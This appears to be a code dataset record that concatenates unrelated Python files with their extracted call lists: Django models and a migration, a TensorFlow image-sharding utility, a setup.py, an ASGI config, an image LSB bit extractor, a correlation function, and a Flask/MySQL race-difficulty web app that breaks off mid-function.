'models.IntegerField', ([], {}), '()\n', (4205, 4207), False, 'from django.db import models\n'), ((4228, 4249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (4247, 4249), False, 'from django.db import models\n'), ((4273, 4294), 'django.db.models.IntegerField', 'models.IntegerField', ([], {}), '()\n', (4292, 4294), False, 'from django.db import models\n'), ((4313, 4343), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(3)'}), '(max_length=3)\n', (4329, 4343), False, 'from django.db import models\n'), ((3713, 3721), 'random.random', 'random', ([], {}), '()\n', (3719, 3721), False, 'from random import random\n')] |
from typing import Optional
from Core.ConfigHandler import ConfigHandler
from FlexioFlow.Options import Options
from FlexioFlow.StateHandler import StateHandler
from VersionControlProvider.Issuer import Issuer
from VersionControlProvider.IssuerFactory import IssuerFactory
from VersionControlProvider.Issuers import Issuers
class IssuerHandler:
def __init__(self, state_handler: StateHandler, config_handler: ConfigHandler,options: Options):
self.state_handler: StateHandler = state_handler
self.config_handler: ConfigHandler = config_handler
self.options: Options = options
def issuer(self) -> Optional[Issuer]:
issuers: Issuers = Issuers.GITHUB
issuer = None
try:
issuer: Issuer = IssuerFactory.build(self.state_handler, self.config_handler, issuers,self.options)
except ValueError:
print('Can\'t get Issuer')
finally:
return issuer
| [
"VersionControlProvider.IssuerFactory.IssuerFactory.build"
] | [((756, 844), 'VersionControlProvider.IssuerFactory.IssuerFactory.build', 'IssuerFactory.build', (['self.state_handler', 'self.config_handler', 'issuers', 'self.options'], {}), '(self.state_handler, self.config_handler, issuers, self.\n options)\n', (775, 844), False, 'from VersionControlProvider.IssuerFactory import IssuerFactory\n')] |
import tensorflow as tf
import numpy as np
import os
import imageio
from utils import get_shardsize, get_zeros_array
def resize(image, target_shape):
    """Rescale `image` so its spatial dimensions match `target_shape`.

    The interpolation is pinned to the CPU and may change the aspect
    ratio.  The float result produced by TensorFlow is cast back to the
    input image's original dtype before returning.
    """
    dtype_in = image.dtype
    target_hw = target_shape[:2]
    with tf.device('/CPU:0'):
        scaled = tf.image.resize(image, target_hw).numpy()
    assert scaled.shape == target_shape
    return scaled.astype(dtype_in)
def fit_image(image, target_shape, fit_method):
    """Force `image` to have exactly `target_shape`, using `fit_method`.

    fit_method must be one of:
      * 'resize'      -- rescale (may change the aspect ratio)
      * 'center_crop' -- crop equal margins from each side
      * 'random_crop' -- take a random patch via tf.image.random_crop

    If the image is smaller than the target in either spatial dimension,
    crop methods fall back to resizing (with a warning printed).
    An image that already matches `target_shape` is returned unchanged.
    """
    assert isinstance(image, np.ndarray), "Image must be numpy array"
    assert len(image.shape) == 3 and image.shape[-1] == 3, "Original Image shape must be of shape (H, W, 3)."
    assert len(target_shape) == 3 and target_shape[-1] == 3, "Desired Image shape must be of shape (H, W, 3)."
    assert fit_method in ['resize', 'center_crop', 'random_crop'], "Crop method must be one of 'resize', 'center_crop' or 'random_crop' "

    if image.shape == target_shape:
        return image

    h, w = image.shape[0], image.shape[1]
    htar, wtar = target_shape[0], target_shape[1]

    # Too small to crop from: resizing is the only way to reach the target.
    if h < htar or w < wtar:
        if fit_method != 'resize':
            print("Your selected fit method is {} but your desired image shape is larger than the given image's shape. Using resize instead - note that this may change the image aspect ratio.".format(fit_method), end="\r")
        return resize(image, target_shape)

    if fit_method == 'resize':
        return resize(image, target_shape)

    if fit_method == 'center_crop':
        margin_h = (h - htar) // 2
        margin_w = (w - wtar) // 2
        cropped = image[margin_h:h - margin_h, margin_w:w - margin_w]
        # When the size difference is odd, one surplus row/column remains;
        # drop it from the trailing edge.
        if cropped.shape[0] != htar:
            cropped = cropped[:-1]
        if cropped.shape[1] != wtar:
            cropped = cropped[:, :-1]
        assert cropped.shape == target_shape, cropped.shape
        return cropped

    # fit_method == 'random_crop'
    dtype_in = image.dtype
    with tf.device('/CPU:0'):
        patch = tf.image.random_crop(tf.constant(image), target_shape).numpy()
    assert patch.shape == target_shape
    return patch.astype(dtype_in)
def images_to_train_dataset(writedir, datadir, target_shape, fit_method='resize'):
    '''
    Convert a folder of jpg/png images into sharded numpy arrays for training.

    writedir: folder where the .npy shards are created
    datadir: folder containing the source jpg/png files
    target_shape: the desired (H, W, 3) shape of every image
    fit_method: how to adjust images to target_shape; one of
                'resize', 'center_crop' or 'random_crop'
    returns: the number of training examples processed.
    '''
    if len(os.listdir(datadir)) == 0:
        raise RuntimeError("No training images were found. Data directory should not be empty. ")
    elif os.path.isfile(datadir):
        raise RuntimeError("data directory should not be a file, it should be a folder. You may have to unzip your files to a new folder.")
    if os.path.isfile(writedir):
        raise RuntimeError("The directory you want to write to is an existing file.")
    elif writedir == datadir:
        raise RuntimeError("The numpy arrays should be written to a different directory than the original.")
    elif os.path.isdir(writedir):
        if len(os.listdir(writedir)) != 0:
            print("Files already exist in this directory. Will use these for training.")
            # NOTE(review): this returns the number of existing *files* in
            # writedir, not the number of images they contain — confirm
            # callers expect that.
            return len(os.listdir(writedir))
    else:
        os.mkdir(writedir)
    shard_size = get_shardsize(target_shape)
    # assumes get_zeros_array returns an empty (0, H, W, 3) array used to
    # seed np.concatenate — TODO confirm against utils.
    numpy_dataset = get_zeros_array(target_shape)
    tmp_numpy = get_zeros_array(target_shape)  # small buffer flushed into numpy_dataset in batches of 64; faster than per-image concat.
    count = 0
    files_written = 0
    for impath in sorted(os.listdir(datadir)):
        impath = os.path.join(datadir, impath)
        try:
            image = imageio.imread(impath)
        except:
            continue #cant be converted to numpy array.
        image = fit_image(image, target_shape, fit_method)
        assert len(image.shape) == 3
        image = np.expand_dims(image, axis=0)
        count += 1
        tmp_numpy = np.concatenate((tmp_numpy, image), axis=0)
        # Every 64 buffered images: merge into the main array, then write a
        # full shard to disk once enough images have accumulated.
        if tmp_numpy.shape[0]%64 == 0:
            numpy_dataset = np.concatenate((numpy_dataset, tmp_numpy))
            tmp_numpy = get_zeros_array(target_shape)
            if numpy_dataset.shape[0] >= shard_size:
                data_to_write, remaining_data = numpy_dataset[:shard_size], numpy_dataset[shard_size:]
                print(data_to_write.shape, remaining_data.shape)
                writepath = os.path.join(writedir, 'data_{}.npy'.format(files_written))
                np.save(writepath, data_to_write)
                files_written += 1
                numpy_dataset = remaining_data
    # Flush whatever remains into one final (possibly short) shard.
    numpy_dataset = np.concatenate((numpy_dataset, tmp_numpy))
    writepath = os.path.join(writedir, 'data_{}.npy'.format(files_written))
    if numpy_dataset.shape[0] != 0:
        np.save(writepath, numpy_dataset)
        files_written += 1
    print("A maximum of %d images will be used in training." % count)
    return count
| [
"tensorflow.device",
"os.listdir",
"imageio.imread",
"tensorflow.image.resize",
"os.path.join",
"os.path.isfile",
"os.path.isdir",
"tensorflow.constant",
"os.mkdir",
"numpy.concatenate",
"numpy.expand_dims",
"utils.get_zeros_array",
"utils.get_shardsize",
"numpy.save"
] | [((2888, 2912), 'os.path.isfile', 'os.path.isfile', (['writedir'], {}), '(writedir)\n', (2902, 2912), False, 'import os\n'), ((3406, 3433), 'utils.get_shardsize', 'get_shardsize', (['target_shape'], {}), '(target_shape)\n', (3419, 3433), False, 'from utils import get_shardsize, get_zeros_array\n'), ((3454, 3483), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (3469, 3483), False, 'from utils import get_shardsize, get_zeros_array\n'), ((3500, 3529), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (3515, 3529), False, 'from utils import get_shardsize, get_zeros_array\n'), ((4678, 4720), 'numpy.concatenate', 'np.concatenate', (['(numpy_dataset, tmp_numpy)'], {}), '((numpy_dataset, tmp_numpy))\n', (4692, 4720), True, 'import numpy as np\n'), ((186, 205), 'tensorflow.device', 'tf.device', (['"""/CPU:0"""'], {}), "('/CPU:0')\n", (195, 205), True, 'import tensorflow as tf\n'), ((2715, 2738), 'os.path.isfile', 'os.path.isfile', (['datadir'], {}), '(datadir)\n', (2729, 2738), False, 'import os\n'), ((3657, 3676), 'os.listdir', 'os.listdir', (['datadir'], {}), '(datadir)\n', (3667, 3676), False, 'import os\n'), ((3696, 3725), 'os.path.join', 'os.path.join', (['datadir', 'impath'], {}), '(datadir, impath)\n', (3708, 3725), False, 'import os\n'), ((3966, 3995), 'numpy.expand_dims', 'np.expand_dims', (['image'], {'axis': '(0)'}), '(image, axis=0)\n', (3980, 3995), True, 'import numpy as np\n'), ((4036, 4078), 'numpy.concatenate', 'np.concatenate', (['(tmp_numpy, image)'], {'axis': '(0)'}), '((tmp_numpy, image), axis=0)\n', (4050, 4078), True, 'import numpy as np\n'), ((4850, 4883), 'numpy.save', 'np.save', (['writepath', 'numpy_dataset'], {}), '(writepath, numpy_dataset)\n', (4857, 4883), True, 'import numpy as np\n'), ((2581, 2600), 'os.listdir', 'os.listdir', (['datadir'], {}), '(datadir)\n', (2591, 2600), False, 'import os\n'), ((3148, 3171), 'os.path.isdir', 'os.path.isdir', (['writedir'], 
{}), '(writedir)\n', (3161, 3171), False, 'import os\n'), ((3759, 3781), 'imageio.imread', 'imageio.imread', (['impath'], {}), '(impath)\n', (3773, 3781), False, 'import imageio\n'), ((4146, 4188), 'numpy.concatenate', 'np.concatenate', (['(numpy_dataset, tmp_numpy)'], {}), '((numpy_dataset, tmp_numpy))\n', (4160, 4188), True, 'import numpy as np\n'), ((4213, 4242), 'utils.get_zeros_array', 'get_zeros_array', (['target_shape'], {}), '(target_shape)\n', (4228, 4242), False, 'from utils import get_shardsize, get_zeros_array\n'), ((4549, 4582), 'numpy.save', 'np.save', (['writepath', 'data_to_write'], {}), '(writepath, data_to_write)\n', (4556, 4582), True, 'import numpy as np\n'), ((223, 263), 'tensorflow.image.resize', 'tf.image.resize', (['image', 'target_shape[:2]'], {}), '(image, target_shape[:2])\n', (238, 263), True, 'import tensorflow as tf\n'), ((3369, 3387), 'os.mkdir', 'os.mkdir', (['writedir'], {}), '(writedir)\n', (3377, 3387), False, 'import os\n'), ((1814, 1833), 'tensorflow.device', 'tf.device', (['"""/CPU:0"""'], {}), "('/CPU:0')\n", (1823, 1833), True, 'import tensorflow as tf\n'), ((3188, 3208), 'os.listdir', 'os.listdir', (['writedir'], {}), '(writedir)\n', (3198, 3208), False, 'import os\n'), ((3328, 3348), 'os.listdir', 'os.listdir', (['writedir'], {}), '(writedir)\n', (3338, 3348), False, 'import os\n'), ((1876, 1894), 'tensorflow.constant', 'tf.constant', (['image'], {}), '(image)\n', (1887, 1894), True, 'import tensorflow as tf\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2018-07-05 19:05
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Add a required integer ``agency_id`` column to the ``pad`` model.

    ``default=1`` backfills existing rows; ``preserve_default=False`` means
    the default is only used for the migration and is not kept on the field.
    """

    dependencies = [
        ('bot', '0025_auto_20180705_1839'),
    ]

    operations = [
        migrations.AddField(
            model_name='pad',
            name='agency_id',
            field=models.IntegerField(default=1),
            preserve_default=False,
        ),
    ]
| [
"django.db.models.IntegerField"
] | [((395, 425), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(1)'}), '(default=1)\n', (414, 425), False, 'from django.db import migrations, models\n')] |
__author__ = "<NAME> (Protein Data Bank in Europe; http://pdbe.org)"
__date__ = "$17-Aug-2013 12:39:18$"
import os
from setuptools import setup, find_packages
def read(fname):
    """Return the text of *fname*, resolved relative to this file's directory.

    Fixed: the original left the file handle open (resource leak); a context
    manager now guarantees it is closed.
    """
    path = os.path.join(os.path.dirname(__file__), fname)
    with open(path) as handle:
        return handle.read()


def get_version(rel_path):
    """Extract ``__version__`` from a source file without importing it.

    Scans for the first line starting with ``__version__`` and returns the
    quoted value. Raises RuntimeError when no version assignment is found.
    """
    for line in read(rel_path).splitlines():
        if line.startswith("__version__"):
            delim = '"' if '"' in line else "'"
            return line.split(delim)[1]
    raise RuntimeError("Unable to find version string.")
# Declarative setuptools configuration. The version is parsed out of
# src/pdbecif/__init__.py (see get_version) rather than imported, so
# setup.py works before the package's dependencies are installed.
setup(
    name="PDBeCif",
    version=get_version("src/pdbecif/__init__.py"),
    author="<NAME> (Protein Data Bank in Europe; PDBe)",
    author_email="<EMAIL>",
    test_suite="test",
    include_package_data=True,
    setup_requires=["pytest-runner"],
    tests_require=["tox", "pytest>=3.2", "pytest-cov"],
    # src-layout: importable code lives under src/, test packages excluded.
    package_dir={"": "src"},
    packages=find_packages(
        "src",
        exclude=[
            "*.test",
            "*.test.*",
            "test.*",
            "test",
        ],
    ),
    scripts=[],
    url="http://pypi.python.org/pypi/PDBeCIF/",
    license_file="LICENSE",
    description="A lightweight pure python package for reading, writing and manipulating mmCIF files distributed by the wwPDB.",
    project_urls={
        "Source code": "https://github.com/PDBeurope/pdbecif",
        "Documentation": "https://pdbeurope.github.io/pdbecif/",
    },
    long_description=read("README.md"),
    long_description_content_type="text/markdown",
    classifiers=[
        "License :: OSI Approved :: GNU General Public License v3 (GPLv3)",
        "Programming Language :: Python",
        "Programming Language :: Python :: 2",
        "Programming Language :: Python :: 2.6",
        "Programming Language :: Python :: 2.7",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.2",
        "Programming Language :: Python :: 3.3",
        "Programming Language :: Python :: 3.4",
        "Programming Language :: Python :: 3.5",
        "Programming Language :: Python :: 3.6",
        "Programming Language :: Python :: 3.7",
        "Programming Language :: Python :: Implementation :: CPython",
        "Programming Language :: Python :: Implementation :: PyPy",
        "Operating System :: Unix",
        "Operating System :: MacOS",
        "Operating System :: POSIX",
        "Intended Audience :: Science/Research",
        "Intended Audience :: Developers",
        "Topic :: Scientific/Engineering :: Bio-Informatics",
    ],
    keywords="STAR CIF mmCIF PDB PDBe parsing parser API",
    extras_require={
        "tests": ["pytest", "pytest-cov", "tox"],
        "docs": [
            "sphinx",
            "sphinx_rtd_theme",
            "recommonmark",
            "sphinx-autodoc-typehints",
            "sphinx-markdown-tables",
        ],
    },
)
"os.path.dirname",
"setuptools.find_packages"
] | [((869, 939), 'setuptools.find_packages', 'find_packages', (['"""src"""'], {'exclude': "['*.test', '*.test.*', 'test.*', 'test']"}), "('src', exclude=['*.test', '*.test.*', 'test.*', 'test'])\n", (882, 939), False, 'from setuptools import setup, find_packages\n'), ((208, 233), 'os.path.dirname', 'os.path.dirname', (['__file__'], {}), '(__file__)\n', (223, 233), False, 'import os\n')] |
"""ASGI entry point: exposes ``application`` for an ASGI server to load."""
import os

from channels.routing import ProtocolTypeRouter

from django.core.asgi import get_asgi_application

# The settings module must be configured before the Django application is
# instantiated below.
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "project.settings")

application = ProtocolTypeRouter(
    {
        "http": get_asgi_application(),
        # Just HTTP for now. (We can add other protocols later.)
    }
)
| [
"os.environ.setdefault",
"django.core.asgi.get_asgi_application"
] | [((110, 177), 'os.environ.setdefault', 'os.environ.setdefault', (['"""DJANGO_SETTINGS_MODULE"""', '"""project.settings"""'], {}), "('DJANGO_SETTINGS_MODULE', 'project.settings')\n", (131, 177), False, 'import os\n'), ((235, 257), 'django.core.asgi.get_asgi_application', 'get_asgi_application', ([], {}), '()\n', (255, 257), False, 'from django.core.asgi import get_asgi_application\n')] |
from bitarray import bitarray
from PIL import Image

image = Image.open('knowit_03.png')

# Take only the red channel and keep the least-significant bit of each byte
# (presumably an LSB-embedded hidden message — TODO confirm).
red, *_ = image.split()
bits = [x & 1 for x in red.tobytes()]

#byte_string, *_ = bitarray(bits, endian='little').tobytes().partition(b'\0')
#result = byte_string.decode('ascii')

# Pack the bit stream into bytes (little-endian bit order) and print it raw.
print(bitarray(bits, endian='little').tobytes())
"PIL.Image.open",
"bitarray.bitarray"
] | [((61, 88), 'PIL.Image.open', 'Image.open', (['"""knowit_03.png"""'], {}), "('knowit_03.png')\n", (71, 88), False, 'from PIL import Image\n'), ((275, 306), 'bitarray.bitarray', 'bitarray', (['bits'], {'endian': '"""little"""'}), "(bits, endian='little')\n", (283, 306), False, 'from bitarray import bitarray\n')] |
from Statistics.ZScore import zscore
from Statistics.Mean import mean
from Statistics.StandardDeviation import standard_deviation
from Calculator.Subtraction import subtraction
from Calculator.Division import division
from Calculator.Multiplication import multiplication
from Calculator.Addition import addition
def population_correlation_coefficient(numbers, numbers1):
    """Correlation of two samples computed from their z-score products."""
    zx = zscore(numbers)
    zy = zscore(numbers1)
    products = [a * b for a, b in zip(zx, zy)]
    return division(len(products), sum(products))
"""
x = mean(numbers)
y = mean(numbers1)
m = []
n = []
t = 0
for i in numbers:
zn = division(standard_deviation(numbers), subtraction(x, i))
m.append(zn)
for i in numbers1:
zm = division(standard_deviation(numbers1), subtraction(y, i))
n.append(zm)
for i in range(len(numbers)):
jk = multiplication(m[i], n[i])
t = addition(t, jk)
res = division(subtraction(1, len(numbers), t))
return res
""" | [
"Statistics.ZScore.zscore"
] | [((381, 396), 'Statistics.ZScore.zscore', 'zscore', (['numbers'], {}), '(numbers)\n', (387, 396), False, 'from Statistics.ZScore import zscore\n'), ((405, 421), 'Statistics.ZScore.zscore', 'zscore', (['numbers1'], {}), '(numbers1)\n', (411, 421), False, 'from Statistics.ZScore import zscore\n')] |
from flask import render_template, url_for, request, Flask
from app import app
import pandas as pd
from flaskext.mysql import MySQL
import matplotlib.pyplot as plt
from matplotlib.patches import Patch
plt.switch_backend('agg')  # non-interactive Agg backend so plots render without a display
import numpy as np
import operator # sorting dictionary
import random
import string
############################################################
# Set up the database
#
mysql = MySQL()
# NOTE(review): credentials are hard-coded in source — move them to
# environment variables / config before deploying.
app.config['MYSQL_DATABASE_USER'] = 'freddy'
app.config['MYSQL_DATABASE_PASSWORD'] = '<PASSWORD>'
app.config['MYSQL_DATABASE_DB'] = 'app'
app.config['MYSQL_DATABASE_HOST'] = 'localhost'
mysql.init_app(app)
# Single module-level connection/cursor shared by every request handler.
conn = mysql.connect()
cur = conn.cursor()
########################################
# Race distance in miles per race type (marathon = 26.219 mi, 10K = 6.214 mi).
conversion={'Mar': 26.219,
            '10K': 6.214}
########################################
# Flask
@app.route('/')
@app.route('/index')
def index():
    """Landing page: selection form fed from the preloaded AllEvents map."""
    # We only have 2 race types, let's just hard code this for now:
    return render_template("index.html", AllEvents=AllEvents)
@app.route('/about')
def about():
    """Static 'about' page."""
    return render_template("about.html")
@app.route('/contact')
def contact():
    """Static 'contact' page."""
    return render_template("contact.html")
@app.route('/output')
def output():
    """Build the difficulty report for the selected age/sex/race/event.

    Validates the query-string inputs, encodes them with the same mappings
    used in training, evaluates the regression dot product, and renders the
    report plots. Renders value_error.html when race/event are missing.
    """
    sex_map = {'Female': 1, 'Male': 2}
    age_map = {'U11':0,'U13':1,'U15':2,'U17':3,'U20':4,'U23':5,
               'SEN':6,'V35':7,'V40':8,'V45':9,'V50':10,'V55':11,
               'V60':12,'V65':13,'V70':14,'V75':15,'V80':16,'V85':17}
    # BUG FIX: request.args.get() returns None for a missing key; the old
    # code wrapped it in str() first, and str(None) == "None" is truthy, so
    # the `if not race_type` / `if not event_type` guards could never fire.
    # Validate the raw values BEFORE converting them to strings.
    raw_age = request.args.get('age')
    raw_gender = request.args.get('gender')
    raw_race = request.args.get('race')
    raw_event = request.args.get('event')
    if not raw_race:
        return render_template("value_error.html", AllEvents=AllEvents)
    if not raw_event:
        return render_template("value_error.html", AllEvents=AllEvents)
    age_type = str(raw_age)
    gender_type = str(raw_gender)
    race_type = str(raw_race)
    event_type = str(raw_event)
    args = []
    args.append(age_type)
    args.append(gender_type)
    args.append(race_type)
    age_type = pd.Series(age_type)
    gender_type = pd.Series(gender_type)
    ID = int(pd.Series(event_type)[0])
    # Encode the categorical inputs exactly as during model training.
    age = age_type.map(age_map).astype(int)
    sex = gender_type.map(sex_map).astype(int)
    event = get_event(ID)
    args.append(event)
    time = get_time(ID, event, True)
    gpx_info = get_gpx_info(ID, event, True)
    gpx = gpx_info
    gpx.append(time)  # gpx is now [sum_up, sigma, diff, time]
    beta = get_beta(race_type)
    X = [age, sex, time, gpx_info[0], gpx_info[1], gpx_info[2]]
    # Dot product of the feature vector with the regression coefficients.
    betax = 0.0
    for idx, val in enumerate(X):
        betax += X[idx]*beta[idx]
    # Relative difficulty for this runner...
    score = get_score(float(betax), race_type)
    # ...and the demographics-independent course difficulty.
    course_score = get_course_difficulty(beta, gpx, race_type)
    # Plots for the output page.
    name, name_gpx = build_plot(beta, gpx, race_type, ID)
    name_score = build_S_curve(betax, score, race_type)
    name_diff = build_time_diff_plot(race_type, ID, age, sex)
    return render_template("output.html",
                           betax=betax, score=score, course_score=course_score,
                           event=event, beta=beta, args=args,
                           name=name,
                           name_gpx=name_gpx,
                           name_score=name_score,
                           name_diff=name_diff)
##################################################
# Remove sex/age dependence, average the result
def get_course_difficulty(beta, gpx, race_type):
    """Average the difficulty score over every age/sex category.

    By sweeping all 18 age bands for both sexes and averaging the resulting
    scores, the demographic dependence is removed and only the course
    contribution remains.
    """
    scores = []
    for age in range(18):
        for sex in (1, 2):  # 1 = female, 2 = male (see sex_map)
            features = [age, sex, gpx[3], gpx[0], gpx[1], gpx[2]]
            dot = 0.0
            for i in range(len(features)):
                dot += features[i] * beta[i]
            scores.append(get_score(float(dot), race_type))
    return sum(scores) / len(scores)
##################################################
# Build PLOTS
def build_S_curve(betax, score, race_type):
    """Plot the score-distribution curve and mark this runner's position.

    Saves the figure under a random filename (to defeat browser caching) and
    returns the path with the leading 'app/' stripped, i.e. relative to the
    Flask static root.
    """
    sql_select_query = """SELECT xval,yval FROM d_dist WHERE race_type = %s"""
    cur.execute(sql_select_query, (str(race_type), ))
    record = cur.fetchall()
    xs, ys = [], []
    for row in record:
        xs.append(row[0])
        ys.append(row[1]*10.0)  # rescale difficulty to a 0-10 display range
    fig = plt.figure()
    ax = plt.subplot(111)
    ax.set_xlim(min(xs),max(xs))
    ax.set_ylim(0.0,10.0)
    ax.plot(xs, ys, 'r', linewidth=4.0)
    score = 10.0*score
    # Dashed cross-hairs locating the user's (betax, score) on the curve.
    ax.plot([betax,betax],[0.0, score], c='black',linestyle='--')
    ax.plot([betax,0.0],[score, score], c='black',linestyle='--')
    plt.ylabel('Relative Difficulty', fontsize=16)
    plt.xlabel('Score Distribution', fontsize=16)
    plt.tight_layout()
    rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
    name = 'app/static/images/plots/scores_{}.png'.format(str(rndstring))
    plt.savefig(name)
    plt.close(fig);
    return name[3:]
def build_time_diff_plot(race_type,ID,age,sex):
    """Scatter difficulty vs. average finish time for every event of this
    race type, highlighting the selected event in red.

    Each event is re-scored for the caller's (age, sex), so the plot is
    specific to the current request. Returns the saved plot path minus the
    leading 'app/'.
    """
    Score, Time = [],[]
    ThisScore,ThisTime=[],[]
    for key,val in AllEvents[race_type].items():
        time = get_time(key, val, True)
        gpx_info = get_gpx_info(key, val, True)
        beta = get_beta(race_type)
        X = [age, sex, time, gpx_info[0], gpx_info[1],gpx_info[2]]
        betax = 0.0
        # NOTE(review): this loop rebinds `val`, shadowing the event title
        # from the outer loop (harmless here — `val` is not used afterwards).
        for idx, val in enumerate(X):
            betax += X[idx]*beta[idx]
        newscore = get_score(float(betax), race_type)
        # Scores are rescaled to a 0-10 display range.
        if key==ID:
            ThisScore.append(newscore*10.0)
            ThisTime.append(time)
        else:
            Score.append(newscore*10.0)
            Time.append(time)
    fig = plt.figure()
    ax = plt.subplot(111)
    plt.grid()
    plt.scatter(Time,Score,c='black',s=30,marker='o',label='All Scores')
    plt.scatter(ThisTime,ThisScore,c='red',s=40,marker='^',label='This Race')
    ax.set_ylim(0.0,10.0)
    avg = sum(Time)/len(Time)
    # Pad the x-range by 10% of the mean finish time on both sides.
    ax.set_xlim(min(Time)-0.1*avg,max(Time)+0.1*avg)
    plt.xlabel('Average Finish Time (min)',fontsize=15)
    plt.ylabel('Relative Difficulty',fontsize=15)
    plt.tight_layout()
    rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
    name = 'app/static/images/plots/time_score_{}.png'.format(str(rndstring))
    plt.savefig(name)
    plt.close(fig);
    return name[3:]
################################################################################
# Other methods to help output
#
def build_plot(beta, gpx, race_type, meeting_id):
    """Build the two feature plots for the output page.

    Figure 1 (fig): regression-coefficient bar chart, course-vs-average
    finish time, and the course elevation profile. Figure 2 (fig2):
    elevation gain/loss normalized by distance. Returns
    [features_path, gpx_path], each with the leading 'app/' stripped.
    """
    labels = ['Age', 'Sex', 'Time', 'Elevation', 'Elevation \n Std. Dev.',
              'Elevation \n Difference']
    xint = range(len(labels))
    # Color each coefficient by sign: red <= 0, green > 0.
    palette = []
    for i in beta:
        if i <= 0:
            palette.append('#b7040e')
        else:
            palette.append('#07a64c')
    fig = plt.figure()
    ax1 = plt.subplot2grid((2, 2), (0, 0), colspan=2)
    plt.grid()
    ax1.bar(xint, beta, width=1.0, color=palette)
    plt.ylabel('Importance', fontsize=12)
    plt.title('Regression Feature Importance')
    plt.xticks(xint, labels, rotation=0, wrap=True)
    plt.tight_layout()
    # Let's get the averages for the gpx list for comparison
    flags = ['sum_up', 'sigma', 'diff', 'min_time']
    averages = []
    for i in flags:
        avg = get_avg(str(i), str(race_type))
        averages.append(avg)
    palette2 = ['#ff7f0e','#1f77b4']
    ax2 = plt.subplot2grid((2, 2), (1, 0), colspan=1)
    # gpx[3] is this course's finish time; averages[3] is the race-type mean.
    xint, vals = range(2), [gpx[3],averages[3]]
    min_val = min(gpx[3],averages[3])
    max_val = max(gpx[3],averages[3])
    ax2.bar(xint,vals, width=1.0, color=palette2)
    ax2.set_ylim(0.85*min_val, 1.15*max_val)
    plt.ylabel('Finish Time (min)', fontsize=12)
    plt.xticks(xint, ['Course \n Time', 'Average \n Time'], rotation=0, wrap=True)
    legend_elements = [Patch(facecolor=palette2[0], label='Course Median Time'),
                       Patch(facecolor=palette2[1], label='{} Median Time'.format(race_type))]
    ax2.legend(handles=legend_elements, loc='upper right', frameon=False)
    plt.tight_layout()
    bins, elevation = get_elevation_dict(meeting_id, race_type)
    ax3 = plt.subplot2grid((2, 2), (1, 1), colspan=1)
    ax3.plot(bins, elevation)
    plt.ylabel('Course Elevation (m)', fontsize=12)
    plt.xlabel('Distance (mi)', fontsize=10)
    avg = sum(elevation)/len(elevation)
    ax3.set_ylim(min(elevation) - 0.15*avg,
                 max(elevation) + 0.15*avg)
    plt.tight_layout()
    rndstring = ''.join([random.choice(string.ascii_letters + string.digits) for n in range(10)])
    name = 'app/static/images/plots/features_{}.png'.format(str(rndstring))
    plt.savefig(name)
    # This is VERY TRICKY, sum_up has been normalized by distance BUT the difference
    # feature has not.  This is the correct way to handle this.
    Dist = float(conversion[race_type])
    sum_up = gpx[0]*Dist
    sum_up_a = get_avg("sum_up",race_type)*Dist
    diff = gpx[2]
    diff_a = get_avg("diff",race_type)
    sum_down = sum_up - diff
    sum_down_a = sum_up_a - diff_a
    #print(sum_up, sum_up_a, diff, diff_a, sum_down, sum_down_a, 'TESTING')
    #print(gpx[0], sum_up)
    # Part 2: gain/loss bars, re-normalized back to per-mile units below.
    labels_nice = ['Elev \n Gain', 'Avg Elev \n Gain', 'Elev \n Loss', 'Avg Elev \n Loss']
    labels = ['1','2','3','4']
    values = [sum_up, sum_up_a, sum_down, sum_down_a]
    values = [x/Dist for x in values]
    fig2 = plt.figure()
    ax22 = plt.subplot(111)
    palette3 = ['#ff7f0e','#1f77b4','#ff7f0e','#1f77b4']
    ax22.barh(labels, values, align='center', color=palette3, height=1.0)
    ax22.set_yticklabels(labels_nice)
    ax22.invert_yaxis()  # labels read top-to-bottom
    ax22.set_xlabel('Elevation Gain/Loss Normalized by Distance (m/mi)')
    plt.title("GPS Features")
    name_gpx = 'app/static/images/plots/gpx_{}.png'.format(str(rndstring))
    plt.grid()
    plt.savefig(name_gpx)
    plt.close(fig);
    plt.close(fig2);
    return [name[3:], name_gpx[3:]]
##################################################
# Done PLOTTING
##################################################
##################################################
# SQL TASKS
#
def sql_get_events(flag, unique=True):
    """Fetch {meeting_id: event_title} for one race type.

    When *unique* is true, only the first meeting_id (in title order) is
    kept for each distinct event title.
    """
    query = """SELECT meeting_id, event_title FROM race_info WHERE race_type = %s ORDER BY event_title"""
    cur.execute(query, (str(flag), ))
    rows = cur.fetchall()
    events = {meeting_id: title for meeting_id, title in rows}
    if not unique:
        return events
    # De-duplicate by title, keeping the first meeting_id encountered.
    first_id_for_title = {}
    for meeting_id, title in events.items():
        if title not in first_id_for_title:
            first_id_for_title[title] = meeting_id
    return {meeting_id: title for title, meeting_id in first_id_for_title.items()}
def get_event(ID):
    """Look up the event_title for a single meeting_id."""
    cur.execute("""SELECT event_title FROM race_info WHERE meeting_id = %s""", (str(ID), ))
    rows = cur.fetchall()
    return rows[0][0]
def get_time(ID, event, use_event=True):
    """Average ``min_time`` over all records for the event (or one meeting).

    Fixed for consistency with get_gpx_info: ``use_event=False`` now queries
    by ``ID`` (meeting_id); the original ignored both parameters and always
    queried by event title. The default path is unchanged, so existing
    callers (which all pass True) behave identically.
    """
    sql_select_query = """SELECT meeting_id, min_time FROM race_info WHERE event_title = %s"""
    flag = str(event)
    if not use_event:
        sql_select_query = """SELECT meeting_id, min_time FROM race_info WHERE meeting_id = %s"""
        flag = str(ID)
    cur.execute(sql_select_query, (str(flag), ))
    record = cur.fetchall()
    # An event title can have multiple records (one per year); average them.
    time_avg = 0.0
    for row in record:
        time_avg += row[1]
    N = len(record)
    time_avg /= N
    return time_avg
def get_gpx_info(ID, event, use_event=True):
    """Return [sum_up, sigma, diff] averaged over all matching race_info rows.

    Looks up by event title when *use_event* is true, otherwise by
    meeting_id.
    """
    if use_event:
        query = """SELECT meeting_id, sum_up, sigma, diff FROM race_info WHERE event_title = %s"""
        key = str(event)
    else:
